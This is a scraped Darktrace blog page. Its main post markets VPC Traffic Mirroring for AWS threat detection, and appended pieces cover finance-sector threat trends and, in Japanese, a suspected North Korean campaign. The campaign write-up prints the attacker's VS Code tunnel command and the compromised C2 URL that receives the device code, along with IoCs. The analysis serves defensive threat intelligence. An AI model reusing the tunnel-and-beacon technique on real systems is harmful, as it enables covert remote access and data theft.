ブログ
/
/
March 9, 2021

How VPC Traffic Mirroring Boosts Darktrace Security

Find out how Amazon VPC Traffic Mirroring enhances Darktrace's cloud security. Learn about its impact on advanced threat detection and management.
No items found.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
No items found.
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
09
Mar 2021

Darktrace's Cyber AI brings real-time visibility and adaptive, autonomous defense to your AWS cloud security strategy.

The platform continuously learns what normal behavior looks like for every user, device, and workload in your AWS environment. With this deep understanding of usual ‘patterns of life,’ Darktrace  can recognize the subtle deviations that point to a threat, from account takeovers to critical misconfigurations.

This bespoke, real-time knowledge of usual activity allows Darktrace to spot the unknown and unpredictable threats that get through policy-based defenses – all without relying on any rules, signatures, or prior assumptions.

With Amazon Virtual Private Cloud (Amazon VPC) Traffic Mirroring, Darktrace’s self-learning AI can seamlessly access granular packet data in AWS cloud environments, helping the platform build a rich understanding of context. AWS’s recent announcement of the extension of VPC Traffic Mirroring to non-Nitro instance types now allows our customers to gain agentless Cyber AI defense across these instances as well.

Expanding VPC traffic mirroring to non-Nitro instances

Amazon VPC Traffic Mirroring replicates the network traffic from EC2 instances within VPCs and allows customers to leverage this traffic for Darktrace’s AI-driven threat detection and investigation. Darktrace’s Cyber AI learns ‘on the job’ what normal activity looks like in customer AWS environments, in part using the real-time visibility provided by VPC Traffic Mirroring. The platform continuously adapts as each customer’s business evolves, a critical feature given the speed and scale of development in the cloud.

Previously, customers could only enable VPC Traffic Mirroring on their Nitro-based EC2 instances. Now, AWS has announced that this seamless access to hundreds of features from network traffic is extended to select non-Nitro instance types, supporting Darktrace’s ability to easily learn the bespoke behavioral patterns of our customers’ Amazon VPCs.

Customers can now enable VPC Traffic Mirroring on additional instances types such as C4, D2, G3, G3s, H1, I3, M4, P2, P3, R4, X1 and X1e that use the Xen-based hypervisor.* This feature is available in all 20 regions where VPC Traffic Mirroring is currently supported.

VPC Traffic Mirroring supports many of Darktrace’s extensive use cases across AWS, which include:

  • Data exfiltration and destruction: Detects anomalous device connections and user access, as well as unusual resource deletion, modification, and movement;
  • Critical misconfigurations: Catches open S3 buckets, anomalous permission changes, and unusual activity around compliance-related data and devices;
  • Compromised credentials: Spots unusual logins, including brute force attempts and unusual login source/time, as well as unusual user behavior, from rule changes to password resets;
  • Insider threat and admin abuse: Identifies the subtle signs of malicious insiders – including sensitive file access, resource modification, role changes, and adding/deleting users.

Figure 1: Darktrace illuminates activity in AWS

Autonomous investigation and response for AWS cloud environments

The Darktrace Security Module for AWS provides additional visibility across AWS environments via interaction with AWS CloudTrail, allowing for AI-powered monitoring of management and administration activity. With this deep knowledge of how your business operates in the cloud, Darktrace delivers total coverage across all your AWS services, including:

  • EC2
  • IAM
  • S3
  • VPC
  • Lambda
  • Athena
  • DynamoDB
  • Route 53
  • ACM
  • RDS

The recently announced Version 5 of the Darktrace, which focuses on protecting the cloud and the remote workforce, further augments Darktrace’s coverage of AWS environments. Among many other exciting new features, Version 5 extends the reach of Cyber AI Analyst and Darktrace RESPOND to cloud environments like AWS VPCs.

Cyber AI Analyst augments the work of security teams by autonomously reporting on the full scope of security incidents and reduces triage time by up to 92%. Cyber AI Analyst can now also conduct on-demand investigations into users and devices of interest, ingest third-party alerts to trigger new investigations, and automatically feed AI-generated Incident Reports to any SIEM, SOAR, or downstream ticketing system.

Meanwhile, Darktrace RESPOND brings Autonomous Response to the critical infrastructure which AWS VPCs provide. Darktrace's responses are surgically precise and intelligently maintain normal business operations while stopping emerging threats in real time.**

“Darktrace's innovations are outstanding and have really meshed with our current needs as a security team, from the flexibility of our new cloud-delivered deployment to the extended visibility of the Darktrace Client Sensors.”

– CISO, Real Estate

We have also launched a dedicated user interface for visualization and intuitive analysis of cloud-based threats identified across AWS via the Darktrace Security Module.

Self-Learning AI defense across the enterprise

Darktrace offers AI-driven defense of cloud infrastructure in AWS, as well as across SaaS applications, email, corporate networks, industrial systems, and remote endpoints. Taking a fundamentally unique approach, Darktrace provides the industry’s only self-learning platform that gives complete coverage and visibility across the organization.

This is a critical benefit, as businesses and workforces today are increasingly complex and dynamic. Darktrace can connect the dots between unusual behavior in disparate infrastructure areas and ensure cloud security is not siloed from the monitoring of the rest of the organization.

Darktrace’s adaptive and unified approach allows the solution to detect, investigate, and respond to the full range of threats facing the enterprise – even those unpredictable threats that move across dynamic and diverse environments.

Learn more about Darktrace and AWS

* VPC Traffic Mirroring is not supported on the T2, R3 and I2 instance types and previous generation instances.
** This product is only available in AWS for customers who leverage Darktrace osSensors.

No items found.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
No items found.

ダークトレース、韓国を標的とした、VS Codeを利用したリモートアクセス攻撃を特定

Network
January 21, 2026
Watch the NIS2 Webinar
よく読まれているブログ
1
Securing Generative AI: Managing Risk in Amazon Bedrock with Darktrace / CLOUD
Nov 19, 2025
2
How Empowering End Users can Improve Your Email Security and Decrease the Burden on the SOC
May 8, 2024
3
Elevating Network Security: Confronting Trust, Ransomware, & Novel Attacks
Jun 21, 2024
4
The State of AI in Cybersecurity: Unveiling Global Insights from 1,800 Security Practitioners
Apr 9, 2024
5
The State of AI in Cybersecurity: The Impact of AI on Cybersecurity Solutions
May 13, 2024

More in this series

No items found.
さらに読む
No items found.

Blog

/

Network

/

January 28, 2026

The State of Cybersecurity in the Finance Sector: Six Trends to Watch

Default blog imageDefault blog image

The evolving cybersecurity threat landscape in finance

The financial sector, encompassing commercial banks, credit unions, financial services providers, and cryptocurrency platforms, faces an increasingly complex and aggressive cyber threat landscape. The financial sector’s reliance on digital infrastructure and its role in managing high-value transactions make it a prime target for both financially motivated and state-sponsored threat actors.

Darktrace’s latest threat research, The State of Cybersecurity in the Finance Sector, draws on a combination of Darktrace telemetry data from real-world customer environments, open-source intelligence, and direct interviews with financial-sector CISOs to provide perspective on how attacks are unfolding and how defenders in the sector need to adapt.  

Six cybersecurity trends in the finance sector for 2026

1. Credential-driven attacks are surging

Phishing continues to be a leading initial access vector for attacks targeting confidentiality. Financial institutions are frequently targeted with phishing emails designed to harvest login credentials. Techniques including Adversary-in-The-Middle (AiTM) to bypass Multi-factor Authentication (MFA) and QR code phishing (“quishing”) are surging and are capable of fooling even trained users. In the first half of 2025, Darktrace observed 2.4 million phishing emails within financial sector customer deployments, with almost 30% targeted towards VIP users.  

2. Data Loss Prevention is an increasing challenge

Compliance issues – particularly data loss prevention -- remain a persistent risk. In October 2025 alone, Darktrace observed over 214,000 emails across financial sector customers that contained unfamiliar attachments and were sent to suspected personal email addresses highlighting clear concerns around data loss prevention. Across the same set of customers within the same time frame, more than 351,000 emails containing unfamiliar attachments were sent to freemail addresses (e.g. gmail, yahoo, icloud), highlighting clear concerns around DLP.  

Confidentiality remains a primary concern for financial institutions as attackers increasingly target sensitive customer data, financial records, and internal communications.  

3. Ransomware is evolving toward data theft and extortion

Ransomware is no longer just about locking systems, it’s about stealing data first and encrypting second. Groups such as Cl0p and RansomHub now prioritize exploiting trusted file-transfer platforms to exfiltrate sensitive data before encryption, maximizing regulatory and reputational fallout for victims.  

Darktrace’s threat research identified routine scanning and malicious activity targeting internet-facing file-transfer systems used heavily by financial institutions. In one notable case involving Fortra GoAnywhere MFT, Darktrace detected malicious exploitation behavior six days before the CVE was publicly disclosed, demonstrating how attackers often operate ahead of patch cycles

This evolution underscores a critical reality: by the time a vulnerability is disclosed publicly, it may already be actively exploited.

4. Attackers are exploiting edge devices, often pre-disclosure.  

VPNs, firewalls, and remote access gateways have become high-value targets, and attackers are increasingly exploiting them before vulnerabilities are publicly disclosed. Darktrace observed pre-CVE exploitation activity affecting edge technologies including Citrix, Palo Alto, and Ivanti, enabling session hijacking, credential harvesting, and privileged lateral movement into core banking systems.  

Once compromised, these edge devices allow adversaries to blend into trusted network traffic, bypassing traditional perimeter defenses. CISOs interviewed for the report repeatedly described VPN infrastructure as a “concentrated focal point” for attackers, especially when patching and segmentation lag behind operational demands.

5. DPRK-linked activity is growing across crypto and fintech.  

State-sponsored activity, particularly from DPRK-linked groups affiliated with Lazarus, continues to intensify across cryptocurrency and fintech organizations. Darktrace identified coordinated campaigns leveraging malicious npm packages, previously undocumented BeaverTail and InvisibleFerret malware, and exploitation of React2Shell (CVE-2025-55182) for credential theft and persistent backdoor access.  

Targeting was observed across the United Kingdom, Spain, Portugal, Sweden, Chile, Nigeria, Kenya, and Qatar, highlighting the global scope of these operations.  

7. Cloud complexity and AI governance gaps are now systemic risks.  

Finally, CISOs consistently pointed to cloud complexity, insider risk from new hires, and ungoverned AI usage exposing sensitive data as systemic challenges. Leaders emphasized difficulty maintaining visibility across multi-cloud environments while managing sensitive data exposure through emerging AI tools.  

Rapid AI adoption without clear guardrails has introduced new confidentiality and compliance risks, turning governance into a board-level concern rather than a purely technical one.

Building cyber resilience in a shifting threat landscape

The financial sector remains a prime target for both financially motivated and state-sponsored adversaries. What this research makes clear is that yesterday’s security assumptions no longer hold. Identity attacks, pre-disclosure exploitation, and data-first ransomware require adaptive, behavior-based defenses that can detect threats as they emerge, often ahead of public disclosure.

As financial institutions continue to digitize, resilience will depend on visibility across identity, edge, cloud, and data, combined with AI-driven defense that learns at machine speed.  

Learn more about the threats facing the finance sector, and what your organization can do to keep up in The State of Cybersecurity in the Finance Sector report here.  

Acknowledgements:

The State of Cybersecurity in the Finance sector report was authored by Calum Hall, Hugh Turnbull, Parvatha Ananthakannan, Tiana Kelly, and Vivek Rajan, with contributions from Emma Foulger, Nicole Wong, Ryan Traill, Tara Gould, and the Darktrace Threat Research and Incident Management teams.

[related-resource]  

Continue reading
About the author
Nathaniel Jones
VP, Security & AI Strategy, Field CISO

Blog

/

Network

/

January 26, 2026

ダークトレース、韓国を標的とした、VS Codeを利用したリモートアクセス攻撃を特定

Default blog imageDefault blog image

はじめに

ダークトレースのアナリストは、韓国のユーザーを標的とした、北朝鮮(DPRK)が関係していると思われる攻撃を検知しました。このキャンペーンはJavascriptEncoded(JSE)スクリプトと政府機関を装ったおとり文書を使ってVisual Studio Code(VS Code)トンネルを展開し、リモートアクセスを確立していました。

技術分析

Decoy document with title “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026”.
図1: 「2026年上半期国立大学院夜間プログラムの学生選抜に関する文書」という表題のおとり文書。

このキャンペーンで確認されたサンプルは、Hangul Word Processor (HWPX) 文書に偽装したJSEファイルであり、スピアフィッシングEメールを使って標的に送付されたと考えられます。このJSEファイルは複数のBase64エンコードされたブロブを含み、Windows Script Hostによって実行されます。このHWPXファイルは“2026年上半期国立大学院夜間プログラムの学生選抜に関する文書(1)”という名前で、C:\ProgramDataにあり、おとりとして開かれます。この文書は韓国の公務員に関連する事務を管掌する政府機関、人事革新処を装ったものでした。文書内のメタデータから、脅威アクターは文書を本物らしくみせるため、政府ウェブサイトから文書を取得し、編集したと思われます。

Base64 encoded blob.
図2: Base64エンコードされたブロブ

このスクリプトは次に、VSCode CLI ZIPアーカイブをMicrosoftからC:\ProgramDataへ、code.exe(正規のVS Code実行形式)およびout.txtという名前のファイルとともにダウンロードします。

隠されたウィンドウで、コマンドcmd.exe/c echo | "C:\ProgramData\code.exe" tunnel --name bizeugene >"C:\ProgramData\out.txt" 2>&1 が実行され、 “bizeugene”という名前のVS Codeトンネルが確立されます。

VSCode Tunnel setup.
図3: VSCode トンネルの設定

VS Codeトンネルを使うことにより、ユーザーはリモートコンピューターに接続してVisualStudio Codeを実行できます。リモートコンピューターがVS Codeサーバーを実行し、このサーバーはMicrosoftのトンネルサービスに対する暗号化された接続を作成します。その後ユーザーはGitHubまたはMicrosoftにサインインし、VS CodeアプリケーションまたはWebブラウザを使って別のデバイスからこのマシンに接続することができます。VS Codeトンネルの悪用は2023年に最初に発見されて以来、東南アジアのデジタルインフラおよび政府機関を標的とする[1]中国のAPT(AdvancedPersistent Threat)グループにより使用されています。

Contents of out.txt.
図4: out.txtの中身

“out.txt” ファイルには、VS Code Serverログおよび生成されたGitHubデバイスコードが含まれています。脅威アクターがGitHubアカウントからこのトンネルを承認すると、VS Codeを使って侵害されたシステムに接続されます。これにより脅威アクターはこのシステムに対する対話型のアクセスが可能となり、VS Codeターミナルやファイルブラウザーを使用して、ペイロードの取得やデータの抜き出しが可能になります。

GitHub screenshot after connection is authorized.
図5: 接続が承認された後のGitHub画面

このコード、およびトンネルトークン“bizeugene”が、POSTリクエストとしてhttps://www.yespp.co.kr/common/include/code/out.phpに送信されます。このコードは韓国にある正規のサイトですが、侵害されてC2サーバーとして使用されています。

まとめ

この攻撃で見られたHancom文書フォーマットの使用、政府機関へのなりすまし、長期のリモートアクセス、標的の選択は、過去に北朝鮮との関係が確認された脅威アクターの作戦パターンと一致しています。この例だけでは決定的なアトリビューションを行うことはできませんが、既存のDPRKのTTP(戦術、技法、手順)との一致は、このアクティビティが北朝鮮と関係を持つ脅威アクターから発生しているという確信を強めるものです。

また、このアクティビティは脅威アクターがカスタムマルウェアではなく正規のソフトウェアを使って、侵害したシステムへのアクセスを維持できる様子を示しています。VS Codeトンネルを使うことにより、攻撃者は専用のC2サーバーの代わりに、信頼されるMicrosoftインフラを使って通信を行うことができるのです。広く信頼されているアプリケーションの使用は、特に開発者向けツールがインストールされていることが一般的な環境では、検知をより困難にします。既知のマルウェアをブロックすることに重点を置いた従来型のセキュリティコントロールではこの種のアクティビティを識別することはできないかもしれません。ツール自体は有害なものではなく、多くの場合正規のベンダーによって署名されているからです。

作成:タラ・グールド(TaraGould)(マルウェア調査主任)
編集:ライアン・トレイル(Ryan Traill)(アナリストコンテンツ主任)

付録

侵害インジケータ (IoCs)

115.68.110.73 - 侵害されたサイトのIP

9fe43e08c8f446554340f972dac8a68c - 2026년 상반기 국내대학원 석사야간과정 위탁교육생 선발관련 서류 (1).hwpx.jse

MITRE ATTACK

T1566.001- フィッシング: 添付ファイル

T1059- コマンドおよびスクリプトインタプリタ

T1204.002- ユーザー実行

T1027- ファイルおよび情報の難読化

T1218- 署名付きバイナリプロキシ実行

T1105- 侵入ツールの送り込み

T1090- プロキシ

T1041- C2チャネル経由の抜き出し

参考資料

[1]  https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/

Continue reading
About the author
あなたのデータ × DarktraceのAI
唯一無二のDarktrace AIで、ネットワークセキュリティを次の次元へ